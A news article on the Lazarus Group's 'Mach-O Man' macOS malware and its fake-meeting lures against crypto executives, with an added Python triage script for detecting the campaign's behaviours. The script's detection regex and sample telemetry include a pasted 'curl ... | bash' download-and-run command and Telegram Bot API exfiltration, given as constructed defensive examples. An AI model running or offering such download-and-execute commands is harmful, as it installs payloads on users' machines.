North Korea’s Lazarus Group has found yet another way into crypto firms, and this time the approach is subtler than a straightforward break-in.
The hackers are deploying macOS malware dubbed “Mach-O Man”, delivered through bogus meeting invitations, to compromise cryptocurrency executives and fund nine-figure DeFi raids, according to media reports published on Wednesday.
The malware is reportedly spread through hijacked Telegram accounts and fake meeting invites sent to executives at high-value companies. The messages pose as routine business calls or support sessions, so the target has little reason to be suspicious. Once the target engages, they are talked into running commands on their Mac that quietly install the malware.
The malware steals private data from the infected Mac, including login credentials for crypto wallets, passwords and internal information about the victim’s organisation.
It is all the harder to catch because it cleans up after itself, removing its traces once it has finished its job.
The new technique arrives as the wider crypto sector grapples with a rise in hacks and scams, with the Lazarus Group blamed for a majority of them. According to the latest Chainalysis report, the group has stolen $6.75 billion in cryptocurrency since 2016.
Description of the tool
Threat intelligence firm SOC Prime says the “Mach-O Man” malware campaign has been linked to Lazarus Group, specifically its Famous Chollima unit, which is known for targeting crypto and financial companies.
Delivery works as described above: compromised Telegram accounts and fake meeting invites, posing as routine business calls or support sessions, draw the executive into a conversation that lowers their guard.
Once a target engages, they are tricked into running commands on their Mac. According to CoinDesk, the malware is built from several macOS components that quietly survey the device, persist in the background and harvest sensitive data such as login credentials and browser data. That data is then sent back to the attackers over Telegram channels.
Researchers at Google Cloud’s Mandiant say they have seen similar tactics before: fake Zoom calls, compromised messaging accounts and even AI-generated videos used to make the lure convincing, after which victims were pushed into copying and running commands that silently installed malware.
In short, experts say, the group is no longer breaking into systems directly. It gets targets to do it themselves by staging convincing fake meetings and messages that look entirely normal.
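The behaviours the reports describe (a command pasted into a terminal that downloads and runs a payload, data exfiltrated over Telegram, and a dropper that deletes itself) are exactly the kind of thing an EDR or osquery feed on a Mac can be triaged for. The script below is an added example written for this page, not code from SOC Prime, Mandiant or CoinDesk, and it carries no real Mach-O Man indicators because the reports give none. The event shape (dicts with `kind`, `pid`, `parent`, `proc`, `path`, `cmd`, `host`) is an assumed, simplified process-and-network export, the `example.invalid` URL and `/private/tmp/.update` path are constructed sample data, and treating an `rm` of a previously executed binary as "self-deletion" is one plausible reading of "removes all traces of itself", not a documented detail of this malware.

```python
"""Heuristic triage of macOS process/network telemetry for three behaviours:
a pasted download-and-run command, exfiltration to the Telegram Bot API,
and self-deletion of a dropped binary. Added example; the event format and
sample events are assumptions, not real indicators."""
import re
import shlex

# GUI terminals a "copy this into Terminal" lure would be pasted into (assumed list)
TERMINALS = {"Terminal", "iTerm2", "Warp"}

# Rule 1: download-and-execute or decode-and-execute in a single command line
PASTE_EXEC = re.compile(
    r"(curl|wget)\b.*\|\s*(ba|z)?sh\b"                  # curl ... | bash
    r"|base64\s+(-[dD]|--decode)\b.*\|\s*(ba|z)?sh\b"   # echo ... | base64 -d | sh
    r"|\bosascript\s+-e\b"                              # inline AppleScript stager
)

# Locations a user-level dropper can write to without privileges
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/")


def pasted_download_and_run(ev):
    """Exec event from a terminal whose command line fetches or decodes and pipes into a shell."""
    return (ev["kind"] == "exec"
            and ev.get("parent") in TERMINALS
            and PASTE_EXEC.search(ev["cmd"]) is not None)


def telegram_exfil(ev):
    """Network event to the Telegram Bot API from anything other than the Telegram client."""
    return (ev["kind"] == "net"
            and ev.get("host", "").lower() == "api.telegram.org"
            and ev.get("proc") != "Telegram")


def self_delete(ev, known_execs):
    """rm whose target is a binary already seen executing from a user-writable path."""
    if ev["kind"] != "exec":
        return False
    try:
        argv = shlex.split(ev["cmd"])
    except ValueError:          # unbalanced quotes: not a well-formed rm invocation
        return False
    if not argv or argv[0] != "rm":
        return False
    targets = {a for a in argv[1:] if not a.startswith("-")}
    return any(t in known_execs for t in targets)


def triage(events):
    """Return (rule_name, event) hits in event order, tracking writable-path executions."""
    hits = []
    known_execs = set()
    for ev in events:
        if ev["kind"] == "exec" and ev.get("path", "").startswith(WRITABLE_PREFIXES):
            known_execs.add(ev["path"])
        if pasted_download_and_run(ev):
            hits.append(("pasted_download_and_run", ev))
        if telegram_exfil(ev):
            hits.append(("telegram_exfil", ev))
        if self_delete(ev, known_execs):
            hits.append(("self_delete", ev))
    return hits


# Constructed sample telemetry (not real Mach-O Man indicators)
SAMPLE_EVENTS = [
    {"kind": "exec", "pid": 501, "parent": "Terminal", "path": "/bin/zsh",
     "cmd": "zsh -c 'curl -fsSL https://example.invalid/fix.sh | bash'"},
    {"kind": "exec", "pid": 502, "parent": "bash", "path": "/private/tmp/.update",
     "cmd": "/private/tmp/.update --quiet"},
    {"kind": "net", "pid": 502, "proc": ".update", "host": "api.telegram.org", "port": 443},
    {"kind": "net", "pid": 77, "proc": "Telegram", "host": "api.telegram.org", "port": 443},
    {"kind": "exec", "pid": 503, "parent": ".update", "path": "/bin/rm",
     "cmd": "rm -f /private/tmp/.update"},
    {"kind": "exec", "pid": 504, "parent": "Terminal", "path": "/usr/bin/git",
     "cmd": "git pull"},
]

if __name__ == "__main__":
    for rule, ev in triage(SAMPLE_EVENTS):
        print(f"{rule:26s} pid={ev['pid']} {ev.get('cmd') or ev.get('host')}")
```

Run against the sample feed it flags the pasted `curl | bash`, the non-Telegram process talking to `api.telegram.org`, and the `rm` of the binary that ran from `/private/tmp`, while the legitimate Telegram client and an ordinary `git pull` from the terminal produce nothing. These are triage heuristics to surface a chain of events for an analyst, not signatures for the malware itself; the rules are deliberately loose on the paste pattern and strict on the self-deletion check (the target must be a binary that was actually seen executing) to keep false positives down.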
North Korea-linked crypto hacking on the rise
North Korea’s Lazarus Group has become one of the most active state-backed hacking groups in the world, with authorities attributing a series of major cryptocurrency thefts to it over the past few years.
The largest of these came in February 2025, when the group reportedly stole about $1.5 billion from the Bybit exchange, the biggest crypto heist on record and a demonstration of how large and well-organised such operations have become.
According to global experts, the problem goes well beyond isolated attacks. Former members of the UN working group estimated in their 2024 report that at least 40 percent of the funding for North Korea’s weapons development programmes came from cybercrime, including ransomware and attacks on cryptocurrency exchanges and financial institutions.
In addition, the U.S. Department of the Treasury says North Korean hackers stole more than $3 billion over a three-year campaign against banks, exchanges and other digital-asset companies.
Markets are already effectively pricing in another $100 million-plus exploit this year, a sign of how state-linked attackers such as Lazarus have become a systemic risk for crypto, with DeFi having just come through what research sites have called its worst month on record for attacks.